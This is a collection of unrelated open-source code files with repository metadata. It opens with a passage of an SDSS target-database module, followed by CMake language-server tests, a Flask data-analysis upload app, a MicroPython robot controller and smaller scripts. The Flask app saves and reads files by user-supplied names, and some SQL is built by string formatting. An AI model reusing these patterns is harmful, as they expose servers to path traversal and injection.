{ntall} targets\".format(ntall=ntall), flush=True)\n return(ntall)\n\n # Now look at those with a cadence, instrument, and magnitude not null\n nt = (targetdb.Target.select(targetdb.Target.pk)\n .join(targetdb.CartonToTarget)\n .join(targetdb.Instrument, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Cadence, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Magnitude, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Carton)\n .join(targetdb.Version)\n .where((targetdb.Carton.carton == carton) &\n (targetdb.Version.plan == version))).count()\n\n if(nt != ntall):\n print(\"WARNING: only {nt} of {ntall} targets in carton {carton} have cadence, instrument, and magnitude non-null\".format(nt=nt, ntall=ntall, carton=carton))\n\n print(\" ... {nt} targets\".format(nt=nt), flush=True)\n tmp_targets = None\n if(nt > 0):\n tmp_targets = np.zeros(nt, dtype=target_dtype)\n\n ts = (targetdb.Target.select(targetdb.Target.ra,\n targetdb.Target.dec,\n targetdb.Target.pmra,\n targetdb.Target.pmdec,\n targetdb.Target.epoch,\n targetdb.Target.parallax,\n targetdb.Target.pk.alias('target_pk'),\n targetdb.Target.catalogid,\n targetdb.CartonToTarget.pk.alias('carton_to_target_pk'),\n targetdb.CartonToTarget.priority,\n targetdb.CartonToTarget.value,\n targetdb.CartonToTarget.lambda_eff,\n targetdb.CartonToTarget.delta_ra,\n targetdb.CartonToTarget.delta_dec,\n targetdb.CartonToTarget.can_offset,\n targetdb.Magnitude.g,\n targetdb.Magnitude.r,\n targetdb.Magnitude.i,\n targetdb.Magnitude.bp,\n targetdb.Magnitude.gaia_g,\n targetdb.Magnitude.rp,\n targetdb.Magnitude.h,\n targetdb.Magnitude.z,\n targetdb.Magnitude.j,\n targetdb.Magnitude.k,\n targetdb.Carton.carton,\n targetdb.Carton.pk.alias('carton_pk'),\n targetdb.Carton.program,\n targetdb.Mapper.label.alias('mapper'),\n targetdb.Category.label.alias('category'),\n targetdb.Cadence.label_root.alias('cadence'),\n targetdb.Instrument.label.alias('fiberType'),\n catalogdb.Version.plan.alias('catalogdb_plan'),\n targetdb.Version.plan,\n targetdb.Version.tag)\n .join(targetdb.CartonToTarget)\n .join(targetdb.Instrument, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Cadence, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Magnitude, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Carton)\n .join(targetdb.Mapper, peewee.JOIN.LEFT_OUTER).switch(targetdb.Carton)\n .join(targetdb.Version).switch(targetdb.Carton)\n .join(targetdb.Category).switch(targetdb.Target)\n .join(catalogdb.Catalog, on=(catalogdb.Catalog.catalogid == targetdb.Target.catalogid))\n .join(catalogdb.Version)\n .where((targetdb.Carton.carton == carton) &\n (targetdb.Version.plan == version))).dicts()\n\n castn = dict()\n for n in tmp_targets.dtype.names:\n castn[n] = np.cast[type(tmp_targets[n][0])]\n \n problems = []\n for indx, t in enumerate(ts):\n for n in tmp_targets.dtype.names:\n if((n != 'rsid') & (n != 'stage') & (n != 'magnitude')):\n if(t[n] is not None):\n tmp_targets[n][indx] = castn[n](t[n])\n else:\n if(n not in problems):\n print(\"problem with {n}\".format(n=n))\n problems.append(n)\n elif(n == 'magnitude'):\n tmp_targets['magnitude'][indx, 0] = np.float32(t['g'])\n tmp_targets['magnitude'][indx, 1] = np.float32(t['r'])\n tmp_targets['magnitude'][indx, 2] = np.float32(t['i'])\n tmp_targets['magnitude'][indx, 3] = np.float32(t['z'])\n tmp_targets['magnitude'][indx, 4] = np.float32(t['bp'])\n tmp_targets['magnitude'][indx, 5] = 
np.float32(t['gaia_g'])\n tmp_targets['magnitude'][indx, 6] = np.float32(t['rp'])\n tmp_targets['magnitude'][indx, 7] = np.float32(t['j'])\n tmp_targets['magnitude'][indx, 8] = np.float32(t['h'])\n tmp_targets['magnitude'][indx, 9] = np.float32(t['k'])\n\n tmp_targets['rsid'] = tmp_targets['carton_to_target_pk']\n\n if(c2c is not None):\n inofibertype = np.where(tmp_targets['fiberType'] == '')[0]\n if(len(inofibertype) > 0):\n msg = \"WARNING: {n} targets in {c} with no fiberType\".format(n=len(inofibertype), c=carton)\n if(carton in c2c['CartonToFiberType']):\n fiberType = c2c.get('CartonToFiberType', carton)\n print(\"{msg}, SETTING TO {fiberType}\".format(msg=msg, fiberType=fiberType))\n tmp_targets['fiberType'][inofibertype] = fiberType\n else:\n print(\"{msg}, NOT FIXING\".format(msg=msg))\n\n inocadence = np.where(tmp_targets['cadence'] == '')[0]\n if(len(inocadence) > 0):\n msg = \"WARNING: {n} targets in {c} with no cadence\".format(n=len(inocadence), c=carton)\n if(carton in c2c['CartonToCadence']):\n cadence = c2c.get('CartonToCadence', carton)\n print(\"{msg}, SETTING TO {cadence}\".format(msg=msg, cadence=cadence))\n tmp_targets['cadence'][inocadence] = cadence\n if(cadence == 'dark_174x8'):\n ii = np.where((np.abs(tmp_targets['ra'][inocadence] - 90.) < 6.) &\n (np.abs(tmp_targets['dec'][inocadence] + 66.56) < 2.))[0]\n if(len(ii) > 0):\n tmp_targets['cadence'][inocadence[ii]] = 'dark_100x8'\n else:\n print(\"{msg}, NOT FIXING\".format(msg=msg))\n\n return(tmp_targets)\n\n\ndef match_v1_to_v0p5(catalogids_v1=None, all=False):\n \"\"\"Find catalogids in v0.5 corresponding to v1\n \n Parameters\n ----------\n\n catalogids_v1 : ndarray of np.int64\n input catalogids in v1\n\n all : bool\n if set True, return all v0.5 catalogids (not just one)\n\n Returns\n -------\n\n catalogids_v1 : ndarray of np.int64\n catalogids in v1\n\n catalogids_v0p5 : ndarray of np.int64\n catalogids in v0.5 (-1 if not found)\n\n Notes\n -----\n\n If all is False, then the two arrays are in the same\n order as the input list, and have the same length.\n\n If all is True, then only matches are included in the \n output lists, and repeats are included\n\n Hard-coded between these two versions because the db\n has the version names hard-coded into tables\n\"\"\"\n if(len(catalogids_v1) == 0):\n return(np.zeros(0, dtype=np.int64),\n np.zeros(0, dtype=np.int64))\n \n # Construct query\n sql_template = \"\"\"SELECT catalogid1, catalogid2 FROM catalogdb.catalog_ver25_to_ver31_full_unique JOIN (VALUES {v}) AS ver31(catalogid) ON catalogdb.catalog_ver25_to_ver31_full_unique.catalogid2 = ver31.catalogid;\n\"\"\"\n values = \"\"\n ucatalogids_v1 = np.unique(catalogids_v1)\n for value in ucatalogids_v1:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values)\n\n if(all is False):\n # Set up output\n out_catalogids_v1 = catalogids_v1\n out_catalogids_v0p5 = np.zeros(len(catalogids_v1), dtype=np.int64) - 1\n indxs = dict()\n for cid_v1 in ucatalogids_v1:\n indxs[cid_v1] = np.where(catalogids_v1 == cid_v1)[0]\n\n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n catalogid_v1 = row[1]\n catalogid_v0p5 = row[0]\n out_catalogids_v0p5[indxs[catalogid_v1]] = catalogid_v0p5\n else:\n cursor = database.execute_sql(sql_command)\n out_catalogids_v1 = np.zeros(len(catalogids_v1), dtype=np.int64)\n out_catalogids_v0p5 = np.zeros(len(catalogids_v1), dtype=np.int64)\n i = 0\n for row in cursor.fetchall():\n out_catalogids_v1[i] = 
row[1]\n out_catalogids_v0p5[i] = row[0]\n i = i + 1\n if(i >= len(out_catalogids_v1)):\n out_catalogids_v1 = np.append(out_catalogids_v1,\n np.zeros(len(out_catalogids_v1),\n dtype=np.int64) - 1)\n out_catalogids_v0p5 = np.append(out_catalogids_v0p5,\n np.zeros(len(out_catalogids_v0p5),\n dtype=np.int64) - 1)\n out_catalogids_v1 = out_catalogids_v1[0:i]\n out_catalogids_v0p5 = out_catalogids_v0p5[0:i]\n \n return(out_catalogids_v1, out_catalogids_v0p5)\n\n\ndef catalogids_are_targets(catalogids=None):\n \"\"\"Check if catalogids are in target table\n\n Parameters\n ----------\n\n catalogids : ndarray of np.int64\n catalogids \n\n Returns\n -------\n\n istarget : ndarray of bool\n whether present\n\"\"\"\n # Construct query\n sql_template = \"\"\"SELECT targetdb.target.catalogid FROM targetdb.target\nJOIN (VALUES {v}) AS input(catalogid) ON targetdb.target.catalogid = input.catalogid;\n\"\"\"\n\n values = \"\"\n ucatalogids = np.unique(catalogids)\n for value in ucatalogids:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values)\n\n # Set up output\n istarget = np.zeros(len(catalogids), dtype=bool)\n indxs = dict()\n for cid in ucatalogids:\n indxs[cid] = np.where(catalogids == cid)[0]\n \n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n catalogid = row[0]\n istarget[indxs[catalogid]] = True\n\n return(istarget)\n\n\ndef catalogids_to_target_ids(catalogids=None, input_catalog=None):\n \"\"\"Return target_ids for input catalog for catalogid\n\n Parameters\n ----------\n\n catalogids : ndarray of np.int64\n catalogids \n\n input_catalog : str\n name of input catalog (like 'tic_v8')\n\n Returns\n -------\n\n target_ids : ndarray of np.int64\n input catalog IDs\n\"\"\"\n # Construct query\n sql_template = \"\"\"SELECT catalogdb.catalog.catalogid, catalogdb.catalog_to_{s}.target_id FROM catalogdb.catalog\nJOIN catalogdb.catalog_to_{s} ON catalogdb.catalog.catalogid = catalogdb.catalog_to_{s}.catalogid\nJOIN (VALUES {v}) AS desired(catalogid) ON catalogdb.catalog.catalogid = desired.catalogid;\n\"\"\"\n\n values = \"\"\n ucatalogids = np.unique(catalogids)\n for value in ucatalogids:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values, s=input_catalog)\n\n # Set up output\n target_ids = np.zeros(len(catalogids), dtype=np.int64) - 1\n indxs = dict()\n for cid in ucatalogids:\n indxs[cid] = np.where(catalogids == cid)[0]\n \n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n catalogid = row[0]\n target_id = row[1]\n target_ids[indxs[catalogid]] = target_id\n\n return(target_ids)\n\n\ndef target_ids_to_catalogids(target_ids=None, input_catalog=None,\n crossmatch=None):\n \"\"\"Map target_id to a catalogids from a particular version\n\n Parameters\n ----------\n\n target_ids : ndarray of np.int64\n IDs from input catalog\n\n crossmatch : str\n cross match version\n\n input_catalog : str\n name of input catalog (like 'tic_v8')\n\n Returns\n -------\n\n catalogids : ndarray of np.int64\n catalogids \n\"\"\"\n # Construct query\n sql_template = \"\"\"SELECT catalogdb.catalog_to_{s}.target_id, catalogdb.catalog.catalogid FROM catalogdb.catalog_to_{s}\nJOIN (VALUES {v}) AS desired(target_id) ON catalogdb.catalog_to_{s}.target_id = desired.target_id\nJOIN catalogdb.catalog ON catalogdb.catalog.catalogid = catalogdb.catalog_to_{s}.catalogid\nJOIN catalogdb.version ON catalogdb.version.id = 
catalogdb.catalog.version_id\nWHERE catalogdb.version.plan = '{c}';\n\"\"\"\n\n values = \"\"\n utarget_ids = np.unique(target_ids)\n for value in utarget_ids:\n values = values + \"({v}),\".format(v=value)\n values = values[0:-1]\n sql_command = sql_template.format(v=values, c=crossmatch, s=input_catalog)\n\n # Set up output\n catalogids = np.zeros(len(target_ids), dtype=np.int64) - 1\n indxs = dict()\n for tid in utarget_ids:\n indxs[tid] = np.where(target_ids == tid)[0]\n \n # Run query\n cursor = database.execute_sql(sql_command)\n for row in cursor.fetchall():\n target_id = row[0]\n catalogid = row[1]\n catalogids[indxs[target_id]] = catalogid\n\n return(catalogids)\n","repo_name":"sdss/robostrategy","sub_path":"python/robostrategy/targets.py","file_name":"targets.py","file_ext":"py","file_size_in_byte":17970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26898656592","text":"import subprocess\nfrom pathlib import Path\n\nfrom cmake_language_server.api import API\n\n\ndef test_query_with_cache(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n assert api.query()\n\n query = cmake_build / \".cmake\" / \"api\" / \"v1\" / \"query\"\n assert query.exists()\n\n reply = cmake_build / \".cmake\" / \"api\" / \"v1\" / \"reply\"\n assert reply.exists()\n\n\ndef test_query_without_cache(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n (cmake_build / \"CMakeCache.txt\").unlink()\n\n assert not api.query()\n\n\ndef test_read_variable(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n assert api.query()\n assert api.read_reply()\n\n assert api.get_variable_doc(\"testproject_BINARY_DIR\")\n\n\ndef test_read_cmake_files(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n assert api.query()\n api.read_reply()\n\n import platform\n\n system = platform.system()\n cxx = api.get_variable_doc(\"CMAKE_CXX_COMPILER_ID\")\n assert cxx is not None\n if system == \"Linux\":\n assert \"GNU\" in cxx\n elif system == \"Windows\":\n assert \"MSVC\" in cxx\n elif system == \"Darwin\":\n assert \"Clang\" in cxx\n else:\n raise RuntimeError(\"Unexpected system\")\n\n\ndef test_parse_commands(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n\n p = subprocess.run(\n [\"cmake\", \"--help-command-list\"],\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n commands = p.stdout.strip().split(\"\\n\")\n\n for command in commands:\n assert api.get_command_doc(command) is not None, f\"{command} not found\"\n\n break_doc = api.get_command_doc(\"break\")\n assert break_doc is not None and \"break()\" in break_doc\n assert api.get_command_doc(\"not_existing_command\") is None\n\n\ndef test_parse_variables(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n\n p = subprocess.run(\n [\"cmake\", \"--help-variable-list\"],\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n variables = p.stdout.strip().split(\"\\n\")\n\n for variable in variables:\n if \"<\" in variable:\n continue\n assert api.get_variable_doc(variable) is not None, f\"{variable} not found\"\n\n assert api.get_variable_doc(\"BUILD_SHARED_LIBS\") is not None\n assert api.get_variable_doc(\"not_existing_variable\") is None\n\n\ndef test_parse_modules(cmake_build: Path) -> None:\n api = API(\"cmake\", cmake_build)\n api.parse_doc()\n\n p = subprocess.run(\n [\"cmake\", \"--help-module-list\"],\n 
universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n modules = p.stdout.strip().split(\"\\n\")\n\n for module in modules:\n if module.startswith(\"Find\"):\n assert (\n api.get_module_doc(module[4:], True) is not None\n ), f\"{module} not found\"\n else:\n assert api.get_module_doc(module, False) is not None, f\"{module} not found\"\n\n assert api.get_module_doc(\"GoogleTest\", False) is not None\n assert api.get_module_doc(\"GoogleTest\", True) is None\n assert api.search_module(\"GoogleTest\", False) == [\"GoogleTest\"]\n assert api.search_module(\"GoogleTest\", True) == []\n assert api.get_module_doc(\"Boost\", False) is None\n assert api.get_module_doc(\"Boost\", True) is not None\n assert api.search_module(\"Boost\", False) == []\n assert api.search_module(\"Boost\", True) == [\"Boost\"]\n","repo_name":"regen100/cmake-language-server","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":274,"dataset":"github-code","pt":"61"} +{"seq_id":"13409210430","text":"import ctypes\nimport ctypes.wintypes\n\n# Define necessary Windows API functions and types\nuser32 = ctypes.windll.user32\n\n# FindWindowA function\nFindWindowA = user32.FindWindowA\nFindWindowA.argtypes = [ctypes.c_char_p, ctypes.c_char_p]\nFindWindowA.restype = ctypes.wintypes.HWND\n\n# SetWindowTextW function\nSetWindowTextW = user32.SetWindowTextW\nSetWindowTextW.argtypes = [ctypes.wintypes.HWND, ctypes.c_wchar_p]\nSetWindowTextW.restype = ctypes.c_bool\n\ndef change_paint_title(new_title):\n # Find the Paint window by its class name (\"Paint\")\n paint_window = FindWindowA(b\"MSPaintApp\", None)\n\n if paint_window:\n # Change the title of the Paint window\n success = SetWindowTextW(paint_window, new_title)\n\n if success:\n print(f\"Title of Paint window changed to: {new_title}\")\n else:\n print(\"Failed to change the title of the Paint window.\")\n else:\n print(\"Paint window not found.\")\n\nif __name__ == \"__main__\":\n new_title = \"Hello from Python!\"\n change_paint_title(new_title)\n","repo_name":"mhmd-azeez/c-ffi","sub_path":"hwnd/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"12389218988","text":"from itertools import permutations\n\ndef list_to_int(arr):\n string = \"\"\n for l in arr:\n string += l\n return int(string)\n\ndef calc(num1, num2, sign):\n if sign == \"+\":\n return num1+num2\n if sign == \"-\":\n return num1-num2\n if sign == \"*\":\n return num1*num2\n \ndef calc_with_operator(operands, operators, prior_opr):\n operators.reverse()\n operators.append(\"\")\n operators.reverse()\n\n stack = []\n num_stack = []\n opr_stack = []\n \n for operand, operator in zip(operands, operators):\n if not num_stack:\n num_stack.append(operand)\n continue\n \n if operator == prior_opr:\n num_stack.append(calc(num_stack.pop(), operand, operator))\n continue\n else:\n num_stack.append(operand)\n opr_stack.append(operator)\n \n return num_stack, opr_stack\n \ndef seperator(expression):\n signs = [\"+\", \"-\", \"*\"]\n \n number = []\n num_stack = []\n opr_stack = []\n for e in expression:\n if e in signs:\n num_stack.append(list_to_int(number))\n opr_stack.append(e)\n number = []\n else:\n number.append(e)\n num_stack.append(list_to_int(number))\n \n return num_stack, opr_stack\n\ndef calc_with_priority(operands, operators, priority):\n 
tmp_operands = [operand for operand in operands]\n    tmp_operators = [operator for operator in operators]\n\n    for p in priority:\n        tmp_operands, tmp_operators = calc_with_operator(tmp_operands, tmp_operators, p)\n    \n    return int(tmp_operands[0])\n    \n    \n\ndef solution(expression):\n    operands, operators = seperator(expression)\n    \n    priorities = list(permutations(list(set(operators))))\n    print(priorities)\n    \n    max_val = 0\n    for priority in priorities:\n        max_val = max(max_val, abs(calc_with_priority(operands, operators, priority)))\n    \n    return max_val","repo_name":"hana-algorithm-study/coding-test","sub_path":"상준/프로그래머스/lv2/67257. [카카오 인턴] 수식 최대화/[카카오 인턴] 수식 최대화.py","file_name":"[카카오 인턴] 수식 최대화.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14123884186","text":"from flask import *\r\nimport pandas as pd\r\nimport os\r\nfrom flask_cors import CORS\r\nfrom flask_jsonpify import jsonpify\r\nimport matplotlib.pyplot as plt\r\n\r\napp=Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route('/upload', methods = ['POST']) \r\ndef upload(): \r\n    if request.method == 'POST': \r\n        f = request.files['file'] \r\n        f.save(f.filename) \r\n        # print(request.get_data())\r\n\r\n        # print(\"fine\")\r\n        try:\r\n            df=pd.read_csv(f.filename)\r\n        except:\r\n            try:\r\n                df=pd.read_excel(f.filename)\r\n            except:\r\n                return jsonify(\"Please upload a valid file. i.e the file should be CSV or Xlsx\")\r\n        print(df)\r\n        return jsonify(\"File uploaded successfully\")\r\n\r\n\r\n@app.route('/<filename>/head')\r\ndef head(filename):\r\n    try:\r\n        df=pd.read_csv(filename, header=None)\r\n    except:\r\n        df=pd.read_excel(filename, header=None)\r\n\r\n    print(\"---------------------------------\")\r\n    \r\n    head = df.head().values.tolist()\r\n    print(head)\r\n    JSONP_data = jsonpify(head)\r\n    return JSONP_data\r\n\r\n@app.route('/<filename>/describe')\r\ndef desc(filename):\r\n    try:\r\n        df=pd.read_csv(filename, header=None)\r\n    except:\r\n        df=pd.read_excel(filename, header=None)\r\n    print(\"---------------------------------\")\r\n    desc = df.describe().values.tolist()\r\n    print(desc)\r\n    JSONP_data = jsonpify(desc)\r\n    return JSONP_data\r\n\r\n@app.route('/<filename>/plot/<x>/<y>')\r\ndef plotgraph (filename,x,y):\r\n    try:\r\n        df=pd.read_csv(filename, header=None)\r\n    except:\r\n        df=pd.read_excel(filename, header=None)\r\n    \r\n    X= df[int(x)].values.tolist() \r\n    Y= df[int(y)].values.tolist() \r\n    plt.scatter(X,Y)\r\n    plt.title(\"distribution\")\r\n    plt.xlabel(x)\r\n    plt.ylabel(y)\r\n    print(\"---------------------------------\")\r\n    # print(type(image))\r\n    # return render_template('untitled1.html', name = plt.show())\r\n    plt.savefig(\"plotimage.png\")\r\n    return jsonify(\"okay\")\r\n\r\n@app.route('/<filename>/shape')\r\ndef shape(filename):\r\n    try:\r\n        df=pd.read_csv(filename, header=None)\r\n    except:\r\n        df=pd.read_excel(filename, header=None)\r\n\r\n    print(\"---------------------------------\")\r\n\r\n    x,y= df.shape\r\n    print(x,y)\r\n    dictin={\"rows\":x,\"columns\":y}\r\n    return jsonify(dictin)\r\n\r\n\r\n@app.route('/<filename>/<predfile>/linearregnovice')\r\ndef linearregnovice(filename,predfile):\r\n    try:\r\n        data=pd.read_csv(filename, header=None)\r\n    except:\r\n        data=pd.read_excel(filename, header=None)\r\n    \r\n    print(\"---------------------------------\")\r\n\r\n    try:\r\n        pred=pd.read_csv(predfile, header=None)\r\n    except:\r\n        pred=pd.read_excel(predfile, header=None)\r\n    \r\n    \r\n    from sklearn.model_selection import train_test_split\r\n    from sklearn.linear_model import LinearRegression\r\n    import 
numpy as np\r\n\r\n X = np.array(data.iloc[:,:-1].values) \r\n y = np.array(data.iloc[:,-1].values)\r\n # X=data.iloc[:,:-1].values # print(len(X)) y=df.iloc[:,-1].values\r\n \r\n \r\n dictin={}\r\n # Splitting the data into training and testing data\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25) \r\n print(\"*************************\")\r\n\r\n regr = LinearRegression()\r\n\r\n regr.fit(X_train, y_train)\r\n \r\n # X_pred=np.array([[8],[6],[5]])\r\n X_pred = np.array(pred.iloc[:,:].values) \r\n # X_pred=np.array([[8,2],[6,5],[5,6]])\r\n\r\n y_pred = regr.predict(X_pred)\r\n # print(X_test,y_pred)\r\n print()\r\n print(regr.score(X_test, y_test))\r\n dictin[\"r2_value\"]=regr.score(X_test, y_test)\r\n dictin[\"X_pred\"]=X_pred.tolist()\r\n dictin[\"y_pred\"]=y_pred.tolist()\r\n\r\n return jsonify(dictin)\r\n\r\n\r\nif __name__==\"__main__\":\r\n port=int(os.environ.get(\"PORT\",5000))\r\n app.run(host= \"0.0.0.0\", port=port)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"HarideepSriperumbooduru/MLToolBox","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23760774213","text":"#!/usr/bin/env python\nfrom __future__ import with_statement\nimport os\nfrom setuptools import setup\n\nreadme = 'README.md'\nif os.path.exists('README.rst'):\n readme = 'README.rst'\nwith open(readme) as f:\n long_description = f.read()\n\nsetup(\n name='stacktracer',\n version='0.1.2',\n author='messense',\n author_email='messense@icloud.com',\n url='https://github.com/messense/stacktracer',\n keywords='stack, tracer, multi-threaded, threading',\n description='Stack tracer for multi-threaded applications',\n long_description=long_description,\n py_modules=['stacktracer'],\n install_requires=[\n 'pygments',\n ],\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities',\n ],\n)\n","repo_name":"messense/stacktracer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26031325335","text":"import streamlit as st\nimport pandas as pd\n\n# credentials\npage_title = \"CricStars - Dashboard\"\n\n# streamlit\nst.set_page_config(\n '{}'.format(page_title),\n '🏏',\n layout='wide',\n initial_sidebar_state='collapsed',\n menu_items={\n \"Get Help\": \"https://cricstars.streamlit.app\",\n \"About\": \"CrickStars App\",\n },\n)\n\nplayers_list_upload = st.sidebar.file_uploader(\"Upload Players List\", type=[\"csv\"])\nif players_list_upload is not None:\n players_list = pd.read_csv(players_list_upload)\n st.dataframe(players_list)\nelse:\n st.info(\"Upload players list to continue\")\n\n","repo_name":"hirawatt/cricstars","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34094038060","text":"from machine import PWM, Pin, 
I2C, ADC\nfrom utime import sleep_ms\nfrom ssd1306 import SSD1306_I2C\nimport framebuf\nfrom ultrasonics import *\n\nPROPORCION=0.8\nVELOCITY_R=int((0.805)*65536)\nVELOCITY_L=int((0.75)*65536)\nfrequency=(10000)\nWIDTH = 128\nHEIGHT = 64\n\n\nclass Bot:\n def __init__(self, Ultra):\n self.l1 = PWM(Pin(18))\n self.l1.freq(frequency)\n self.l2 = PWM(Pin(19))\n self.l2.freq(frequency)\n self.step1=0\n self.step2=0\n \n self.Ultra=Ultra\n \n \n self.r1 = PWM(Pin(20))\n self.r1.freq(frequency)\n self.r2 = PWM(Pin(21))\n self.r2.freq(frequency)\n self.stop()\n \n #self.i2c= I2C(1, scl = Pin(15), sda= Pin(14), freq = 200000) \n #self.oled = SSD1306_I2C(WIDTH, HEIGHT, self.i2c)\n #self.erase_oled()\n \n self.encoder2 = Pin(0, Pin.IN)\n self.encoder2.irq(trigger=Pin.IRQ_RISING, handler=self.en2_handler)\n \n self.encoder1 = Pin(2, Pin.IN)\n self.encoder1.irq(trigger=Pin.IRQ_RISING, handler=self.en1_handler)\n \n def en2_handler(self,Pin):\n self.det1=True\n self.step1 += 1\n print(self.step1)\n \n def en1_handler(self,Pin):\n self.det2=True\n self.step2 += 1\n print(self.step2)\n \n \n def left_direction(self):\n self.l1.duty_u16(0)\n self.l2.duty_u16(VELOCITY_L)\n self.r1.duty_u16(VELOCITY_R)\n self.r2.duty_u16(0)\n #sleep_ms(410)\n self.det2=False\n self.step2=0\n while self.step2 < 55:\n if self.det2:\n self.det2=False\n\n def right_direction(self):\n self.l1.duty_u16(VELOCITY_L)\n self.l2.duty_u16(0)\n self.r1.duty_u16(0)\n self.r2.duty_u16(VELOCITY_R)\n #sleep_ms(410)\n self.det1=False\n self.step1=0\n while self.step1 < 58:\n if self.det1:\n self.det1=False\n\n def front_direction(self):\n self.l1.duty_u16(VELOCITY_L)\n self.l2.duty_u16(0)\n self.r1.duty_u16(VELOCITY_R)\n self.r2.duty_u16(0)\n self.det1=False\n self.step1=0\n while self.step1 < 20:\n front=self.Ultra.measure_front()\n if front< 5:\n print(front)\n self.stop()\n break\n if self.det1:\n self.det1=False\n \n def stop(self):\n self.l1.duty_u16(0)\n self.l2.duty_u16(0)\n self.r1.duty_u16(0)\n self.r2.duty_u16(0)\n sleep_ms(500)\n \n def run(self):\n self.front_direction()\n self.left_direction()\n self.right_direction()\n self.stop()\n \n def listener(self, turns):\n negative = True if turns < 0 else False\n while turns != 0:\n turns = turns - 1 if turns > 0 else turns + 1\n if negative:\n #self.print_oled(\"DERECHA\")\n self.right_direction()\n self.stop()\n #self.erase_oled()\n self.stop()\n sleep_ms(500) \n \n else:\n #self.print_oled(\"IZQUIERDA\")\n self.left_direction()\n self.stop()\n #self.erase_oled()\n sleep_ms(500) \n #self.print_oled(\"AVANZA\")\n #self.front_direction()\n #self.stop()\n #self.erase_oled()\n sleep_ms(500)\n \n #def print_oled(self, text):\n # self.oled.text(str(text), 0, 0) \n # self.oled.show()\n\n \n #def erase_oled(self):\n # self.oled.fill(0)\n \n\ndef main():\n bot=Bot(Ultrasonics())\n bot.front_direction()\n bot.stop()\n \nif __name__ == '__main__':\n main()","repo_name":"Valent-in-GIT/Computer-Vision-Personal","sub_path":"Mazebot/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14355961308","text":"# -*- coding: utf-8 -*-\n# web2py/applications//controllers\nfrom cart import Cart\nfrom cart import OrderError\n\n\n\ndef add():\n product = db(db.product.id == request.args(0)).select().first()\n cart = Cart()\n if product.id in cart:\n try:\n # product.qty should be an int that represents\n # the amount avaiable of the product.\n # If amount of the order > 
amount_avaiable, an exception\n            # will be raised.\n            # If amount_avaiable is not set, the module won't check\n            # the available amount.\n            cart.AddAmount(product.id, amount_avaiable=product.qty)\n        except OrderError as e:\n            return e\n    else:\n        cart.NewOrder(product.id)\n    return locals()\n\n\ndef remove():\n    product = db(db.product.id == request.args(0)).select().first()\n    cart = Cart()\n    try:\n        # If the order is not found, an exception will be raised.\n        cart.DecreaseAmount(product.id)\n    except OrderError as e:\n        return e\n    return locals()\n\n\ndef show():\n    cart = Cart()\n    cart_dict = cart.ShowCart()  # A dict with all orders.\n    for id, amount in cart:\n        # Do something or\n        pass\n    return locals()\n\n\n","repo_name":"Marcelo-Theodoro/web2py_cart","sub_path":"example_controller.py","file_name":"example_controller.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
